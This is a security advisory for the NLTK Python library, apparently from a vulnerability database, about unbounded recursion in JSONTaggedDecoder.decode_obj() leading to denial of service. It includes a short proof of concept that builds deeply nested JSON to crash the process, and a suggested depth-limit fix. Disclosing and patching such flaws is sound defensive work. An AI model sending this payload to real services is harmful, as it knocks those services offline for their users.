VDB
KO
MEDIUM

GHSA-rf74-v2fm-23pw

Natural Language Toolkit (NLTK) has unbounded recursion in JSONTaggedDecoder.decode_obj() may cause DoS

Details

### Summary `JSONTaggedDecoder.decode_obj()` in `nltk/jsontags.py` calls itself recursively without any depth limit. A deeply nested JSON structure exceeding `sys.getrecursionlimit()` (default: 1000) will raise an unhandled `RecursionError`, crashing the Python process.

### Affected code File: `nltk/jsontags.py`, lines 47–52 ```python @classmethod def decode_obj(cls, obj): if isinstance(obj, dict): obj = {key: cls.decode_obj(val) for (key, val) in obj.items()} elif isinstance(obj, list): obj = list(cls.decode_obj(val) for val in obj) ```

### Proof of Concept ```python import sys, json from nltk.jsontags import JSONTaggedDecoder

depth = sys.getrecursionlimit() + 50 # e.g. 1050 payload = '{"x":' * depth + "null" + "}" * depth

# Raises RecursionError, crashing the process json.loads(payload, cls=JSONTaggedDecoder) ```

### Impact Any code path that passes externally-supplied JSON to `JSONTaggedDecoder` is vulnerable to denial of service. The severity depends on whether such a path exists in the calling code (e.g. `nltk/data.py`).

### Suggested Fix Add a depth parameter with a hard limit: ```python @classmethod def decode_obj(cls, obj, _depth=0): if _depth > 100: raise ValueError("JSON nesting too deep") if isinstance(obj, dict): obj = {key: cls.decode_obj(val, _depth + 1) for (key, val) in obj.items()} elif isinstance(obj, list): obj = list(cls.decode_obj(val, _depth + 1) for val in obj) ```

Are you affected?

Enter the version of the package you're using.

Affected packages

PyPI / nltk
Introduced in: 0

No fixed version published yet for nltk (pip). Pin to a known-safe version or switch to an alternative.

References